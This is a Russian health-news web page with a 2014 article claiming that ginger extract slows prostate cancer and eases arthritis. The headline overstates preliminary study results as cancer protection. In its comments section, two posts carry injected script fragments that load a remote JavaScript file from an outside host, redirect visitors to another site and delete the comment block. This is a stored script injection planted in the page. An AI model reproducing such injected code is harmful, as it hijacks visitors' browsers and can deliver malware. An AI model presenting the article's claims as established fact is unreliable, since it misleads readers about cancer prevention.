Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Сходите в суши ресторан! ...  >>  Сходите в суши ресторан! Имбирь защищает от рака
 
Обратная связь
 

Сходите в суши ресторан! Имбирь защищает от рака

Размер шрифта
30 июня 2014 00:00
Юрий Малышев
Здоровье инфо
Полина Калинина
Здоровье инфо
  • google_analytics: false
  • Нравится

Экстракт имбиря способен замедлить опухолевый рост, а также способствует замедлению развития рака простаты.

Сходите в суши ресторан! Имбирь защищает от рака

Ученые наблюдали как над лабораторными животными, так и над людьми, и результаты исследования оказались многообещающими. Они сравнивали действие очищенных активных компонентов имбиря и цельного экстракта, и последний показал большую эффективность. 

Дополнительное исследование, результаты которого опубликованы в журнале «Канцерогенез», показало, что при раке простаты у человека экстракт имбиря, содержащий джинджеролы (активные компоненты), на 240% более эффективен, чем смесь очищенных компонентов. Это показывает, что смесь различных растительных веществ более эффективна именно в той комбинации, которая есть в корне имбиря, чем в искусственно созданном коктейле.

Более раннее исследование, опубликованное в «Британском журнале питания», давало предпосылки к тому, что имбирь эффективен при раке простаты. Ученые заявляли о выраженном противоопухолевом, противовоспалительном и антиоксидантном эффектах имбиря. Антиоксиданты разрушают опасные свободные радикалы, которые повреждают клетки.

Кроме того, обсуждаются обезболивающие свойства имбиря. Было проведено исследование, в котором сравнивалась эффективность имбиря, бетаметазона (кортизона) и ибупрофена в лечении остеоартрита и ревматоидного артрита. Противовоспалительное действие экстракта имбиря примерно равнялось таковому у бетаметазона. Имбирь был эффективнее НПВС (нестероидных противовоспалительных средств), которые предотвращают формирование воспалительной реакции, в то время как имбирь характеризовался еще и устранением уже существующих воспалений в суставах.

Результаты исследования лечебного эффекта цельного экстракта имбиря при раке простаты поистине впечатляют, однако действие очищенной смеси активных веществ имбиря менее впечатляющее. Планируются исследования для выяснения точных эффективных доз экстракта имбиря, а также его действия при других типах рака.

Врачи советуют увеличить долю имбиря в вашем рационе. Можно добавлять порезанный имбирь в супы и соусы. Кроме того, его заваривают для получения бодрящего ароматного чая. Можно добавлять немного имбиря в овощные и фруктовые соки.

Хотите больше узнать о различных типах раках и современных средствах лечения? Читайте наш спецпроект «Онко-дозор».

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:36

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:34

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Чем запивать водку, чтобы не было цирроза?   Выпил кофе – спи без рака!   Какой напиток не позволит вам ослепнуть?!   Узнайте, будет ли у вас рак в течение 10 лет  
01 ноября 2013ИНВИТРО – «Марка №1» в России 21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт»
 
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 03 октября 2013Результаты благотворительного марафона «Всем миром»
 

Слайдшоу

1
Еда для плоского живота. Часть 3
9 продуктов, которые сделают вас худой в Новом году
Что можно и чего нельзя с изжогой?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.